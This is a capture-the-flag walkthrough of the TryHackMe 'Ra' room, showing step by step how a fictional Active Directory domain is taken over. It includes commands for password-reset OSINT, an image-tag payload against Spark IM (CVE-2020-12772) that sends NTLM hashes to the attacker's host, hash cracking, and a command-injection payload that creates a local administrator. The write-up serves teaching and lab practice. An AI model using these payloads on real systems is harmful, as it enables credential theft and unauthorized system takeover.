Room: Ra | Difficulty: Hard | OS: Windows Server 2019 (Active Directory)
Flags Captured: 3/3 | Topics: OSINT, SMB, Spark CVE-2020-12772, NTLM Relay, Account Operator Abuse, Scheduled Task Exploitation
Overview
WindCorp is a fictional multibillion-dollar company boasting they're "unhackable." This room walks us through a full Active Directory compromise from a web-based OSINT trick to owning the domain Administrator account, with a creative scheduled task abuse along the way.
Reconnaissance
Nmap
nmap -sCV -A 10.48.138.89 -oA nmap-Ra
Key open ports:
| Port | Service |
|---|---|
| 53 | DNS |
| 80 | HTTP (Microsoft IIS 10.0) |
| 88 | Kerberos |
| 389 | LDAP (Domain: windcorp.thm) |
| 445 | SMB |
| 636 | LDAPS |
This is clearly a Windows Active Directory Domain Controller. Domain: windcorp.thm, hostname: FIRE.
Step 1 - Web OSINT and Password Reset
The Web Portal
Visiting http://10.48.138.89/ reveals a company portal for Wind Corporation with a Reset Password button, an "employees in focus" section showing Emily Jensen, Lily Levesque, and Kirk Uglas, and an IT support staff list.
The reset page is at http://fire.windcorp.thm/reset.asp. It asks for a username and a security question (mother's maiden name / pet name / first car / first grade teacher).
Directory Enumeration
feroxbuster -u http://windcorp.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-d 3 -x php,asp,py,txt,html -C 403,404
Key discovery - the image filename gave it away:
http://windcorp.thm/img/lilyleAndSparky.jpg
Lily Levesque's profile photo is named lilyleAndSparky.jpg - her pet's name is Sparky.
Resetting Lily's Password
- Username:
lilyle - Security question: What is your favourite pet's name?
- Answer:
Sparky
Result:
Your password has been reset to: [REDACTED]
Step 2 - SMB Enumeration
Validate credentials and enumerate shares:
nxc smb 10.48.138.89 -u 'lilyle' -p '[REDACTED]'
nxc smb 10.48.138.89 -u 'lilyle' -p '[REDACTED]' --shares
Readable shares:
| Share | Access |
|---|---|
| IPC$ | READ |
| NETLOGON | READ |
| Shared | READ |
| SYSVOL | READ |
| Users | READ |
Exploring the Shared Share
smbclient //windcorp.thm/Shared -U 'lilyle%[REDACTED]'
smb: \> ls
Flag 1.txt A 45
spark_2_8_3.deb A 29526628
spark_2_8_3.dmg A 99555201
spark_2_8_3.exe A 78765568
spark_2_8_3.tar.gz A 123216290
smb: \> mget *
Flag 1
THM{[REDACTED]}
The presence of Spark IM installer files is the next major hint.
Step 3 - Spark IM and CVE-2020-12772
Spark is an open-source XMPP instant messaging client. Version 2.8.3 is vulnerable to CVE-2020-12772.
The Vulnerability
When a user sends an img tag with an external URL to another Spark user, the recipient's client automatically pre-renders the image, triggering an outbound HTTP request with their NTLM credentials to the attacker's server.
Reference: https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md
Installing Spark on Kali
sudo dpkg -i --ignore-depends=openjdk-8-jre,oracle-java8-jre spark_2_8_3.deb
Fix the Java launch script for modern JDK compatibility:
sudo nano /usr/bin/spark
Add these flags to the java launch command:
java \
--add-opens java.base/java.net=ALL-UNNAMED \
--add-opens java.base/java.lang=ALL-UNNAMED \
--add-opens java.base/java.util=ALL-UNNAMED \
-Dappdir=${wd} \
${javalibrarypath} \
-cp ${classpath} \
${mainclass}
Login to Spark
- Username:
lilyle - Password:
[REDACTED] - Domain:
windcorp.thm
Note: On first login you'll get a certificate error. Go to Advanced, then the General tab, and check "Accept all certificates (self-signed/expired/not trusted)" and "Disable certificate hostname verification".
Capturing NTLM Hashes
Start Responder on your tun0 interface:
sudo responder -I tun0
From the web portal's IT staff list, the user Buse Candan has a green/active icon - try them first. In Spark, open a chat with buse@fire.windcorp.thm and send:
Hey!! <img src=http://<YOUR-TUN0-IP>/a.png>
Responder captures:
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash : buse::WINDCORP:6675ccda3142b25a:3E9EC46D91ECC55692AFE6912F41E08B:...
Cracking the Hash
echo 'buse::WINDCORP:<full_hash_here>' > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Cracked password: [REDACTED]
Step 4 - WinRM Shell as Buse
nxc smb 10.48.138.89 -u 'buse' -p '[REDACTED]'
evil-winrm -i 10.48.138.89 -u 'buse' -p '[REDACTED]'
Flag 2
*Evil-WinRM*PSC:\Users\buse\Desktop>type"Flag 2.txt"THM{[REDACTED]}Step 5 - Privilege Escalation via Account Operator Abuse
Buse's Group Memberships
whoami/allKey finding:
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled
Account Operators can modify user accounts including resetting passwords for non-protected accounts. This is a classic privilege escalation path.
The Scheduled Task Goldmine
C:\>dir# Interesting: C:\scripts\C:\scripts>typelog.txtLastrun:06/03/202623:35:39C:\scripts>typecheckservers.ps1The script checkservers.ps1 runs every 45 seconds, reads C:\Users\brittanycr\hosts.txt, and passes each line directly to Invoke-Expression via Test-Connection. This is command injection via file content. Since brittanycr is a non-admin user, buse as Account Operator can reset their password.
Reset brittanycr's Password
netuserbrittanycr"Hacked@123"/domainAccess brittanycr's SMB Share
smbclient //windcorp.thm/Users -U 'brittanycr%Hacked@123'
smb: \> cd brittanycr\
smb: \brittanycr\> get hosts.txt
Inject the Payload
Craft a malicious hosts.txt that creates a new local administrator:
echo '; net user newuser Password@123 /add; net localgroup Administrators newuser /add' > hosts.txt
Upload it back:
smb: \brittanycr\> put hosts.txt
Wait 45-60 seconds for the scheduled task to execute.
Step 6 - Administrator Shell and Flag 3
evil-winrm -i 10.48.138.89 -u 'newuser' -p 'Password@123'
Verify group membership:
whoami/groups# BUILTIN\Administrators - confirmedFlag 3
*Evil-WinRM*PSC:\Users\Administrator\Desktop>typeFlag3.txtTHM{[REDACTED]}Flags Summary
| Flag | Value |
|---|---|
| Flag 1 | THM{[REDACTED]} |
| Flag 2 | THM{[REDACTED]} |
| Flag 3 | THM{[REDACTED]} |
Key Takeaways
- Image filenames leak OSINT -
lilyleAndSparky.jpgrevealed the pet's name for a password reset. - CVE-2020-12772 (Spark IM) - Never deploy IM clients that auto-render external images without sandboxing; it enables trivial NTLM hash capture.
- Account Operators is dangerous - This AD group is often overlooked but allows modifying most user accounts, including password resets.
- Scripts reading user-controlled files are RCE - The
checkservers.ps1pattern (reading a file and passing its content to Invoke-Expression) is a critical design flaw. - Scheduled tasks running as SYSTEM with writable inputs equals privilege escalation - Always review what scheduled tasks consume and whether lower-privileged users can influence those inputs.
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port/service scanning |
| feroxbuster | Web directory enumeration |
| nxc (NetExec) | SMB enumeration and credential validation |
| smbclient | SMB file access |
| bloodhound-python | AD enumeration |
| BloodHound | AD attack path visualization |
| Spark 2.8.3 | XMPP client (exploit delivery) |
| Responder | NTLM hash capture |
| john | Hash cracking |
| evil-winrm | WinRM shell |
Written as a learning resource. All activities were performed in an authorized TryHackMe lab environment.
For further actions, you may consider blocking this person and/or reporting abuse
